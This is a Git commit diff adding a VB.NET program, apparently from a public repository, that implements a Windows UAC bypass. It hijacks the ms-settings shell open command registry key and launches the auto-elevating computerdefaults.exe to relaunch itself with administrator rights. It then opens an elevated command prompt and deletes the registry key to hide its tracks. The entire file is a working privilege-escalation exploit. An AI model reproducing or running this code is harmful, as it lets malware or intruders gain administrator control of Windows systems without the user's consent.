Add files via upload

DosX-dev · web-flow · commit 7e0de4eff377 · 2023-04-19T20:41:18.000+03:00
diff --git a/ExecuteCMD.vb b/ExecuteCMD.vb
@@ -0,0 +1,46 @@
+﻿'' Coded by DosX
+'' GitHub: https://github.com/DosX-dev
+
+Imports System.Security.Principal
+Imports Microsoft.Win32
+
+Module Execution
+    Public Sub Main()
+        Try
+            If Not New WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) Then : GetUAC()
+            Else
+                Shell($"cmd.exe /c start ""UAC-Exploit"" ""cmd.exe"" ""/k @echo     ^^ ^^ ^^ ^^ ^^ ^^  :o", AppWinStyle.Hide, True)
+                Dim ShellParentPath As RegistryKey = Registry.CurrentUser.OpenSubKey("Software\Classes\ms-settings", True)
+                ShellParentPath.DeleteSubKeyTree("shell") : ShellParentPath.Close()
+            End If
+        Catch : End Try
+    End Sub
+    Public Function OpenRegSubKey(ByVal RegPath As String) As RegistryKey
+        Dim FRegPath As RegistryKey = Registry.CurrentUser.OpenSubKey($"Software\{RegPath}", True)
+        Return If(FRegPath Is Nothing,
+                  Registry.CurrentUser.CreateSubKey($"Software\{RegPath}", True),
+                  FRegPath)
+    End Function
+    Public Sub GetUAC()
+        If Not New WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) Then
+
+            For Each Path In {"Classes", "Classes\ms-settings", "Classes\ms-settings\shell", "Classes\ms-settings\shell\open"}
+                OpenRegSubKey(Path)
+            Next
+
+            Try
+                Dim DelegatePath As RegistryKey = OpenRegSubKey("Classes\ms-settings\shell\open\command")
+                DelegatePath.SetValue("", Process.GetCurrentProcess().MainModule.FileName, RegistryValueKind.String)
+                DelegatePath.SetValue("DelegateExecute", 0, RegistryValueKind.DWord) : DelegatePath.Close()
+
+                Process.Start(New ProcessStartInfo With {
+                    .CreateNoWindow = True, .UseShellExecute = False,
+                    .RedirectStandardError = True, .RedirectStandardOutput = True,
+                    .FileName = "cmd.exe", .Arguments = "/c @start computerdefaults.exe"
+                })
+            Catch : End Try
+        Else
+            OpenRegSubKey("Classes\ms-settings\shell\open\command").SetValue(Nothing, Nothing, RegistryValueKind.String)
+        End If
+    End Sub
+End Module
